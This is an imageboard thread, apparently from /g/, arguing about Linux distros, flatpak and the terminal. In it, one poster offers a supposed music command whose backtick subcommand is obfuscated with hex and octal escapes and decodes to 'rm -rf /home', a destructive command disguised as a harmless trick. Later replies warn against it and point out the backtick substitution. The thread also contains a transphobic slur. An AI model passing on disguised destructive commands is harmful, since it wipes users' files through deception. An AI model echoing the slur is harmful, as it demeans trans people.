Well maybe. But like...mint is green. Debian is red eewwwwwww. And doing sudo apt install green in Debian is too hard. Doing sudo apt install ugly desktop is also too hard, too tinkertranny if you know what I mean so using mint is better because it has all my bloat preinstalled.
Ubuntu is also ugly because orange.

O algo.

HOLY BASED. I sure hope talking about chadlestine helped the development of the distro, for example avoiding hosting a backdoored iso

LTS distros like Mint only make sense if you have old hardware.

Otherwise you're literally gimping your performance by using this.

Wait what??? Is Mint really maintained by the Russians??? That's a huge security risk, I don't want my data leaked to the KGB.

This might be the silliest reason I ever heard, not in a bad way
If mint uses flathub like anon said, that wasn't included in ur system, neither were all the things you installed with it
I don't use debian/mint but as far as I know installing flatpak+flathub takes less than 15MB and two commands, one to install flatpak (apt install flatpak I guess lol, included in the debian repos) and the other to add the flathub repo to your now installed flatpak... you are not really changing anything, debian won't die or stop working just because of that, at least I don't see the problem and I don't really get the logic

Well, I love openSUSE but I don't want to use it since it doesn't have flathub or another store included. Even if you search up "how to install x" the guide BY openSUSE and even DEBIAN wants you to do things by command-line, which makes it seem like Debian and openSUSE, well, prefers the command lines and not software store

so indirectly theyre telling you to not use a store but use the terminal, so its the preffered way

on pop zorin and mint the store is preferred

but i dont want to use a terminal, but those distros want you to use the terminal, otherwise their guides and wikis would just be "go with flatpak" but its not its always terminal lines

Based. I agree in principle anon. Software should be easy to install and installers should be built in. No normal user should be expectee to touch a terminal just to use their computer.

That said I will say you can do some dank shit in the terminal though like have it play music based on characters/code.

Here's the /g/ theme for example

aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"

>aplay --rawaudio "`$'\x72\x6d' $'\55\x72\x66' $'\57\x68\x6f\x6d\x65'`"
do not run this
i ran it years ago
nukes your stuff

I literally just ran it now and nothing happened except for a little chiptune jingle played through my headphones
Anonymous No.106553194 [Report]
>>106553188
the thing that gives it away is the
aplay --rawaudio "`$'\x72\
aplay --rawaudio "`

because the ` character lets it run another subcommand
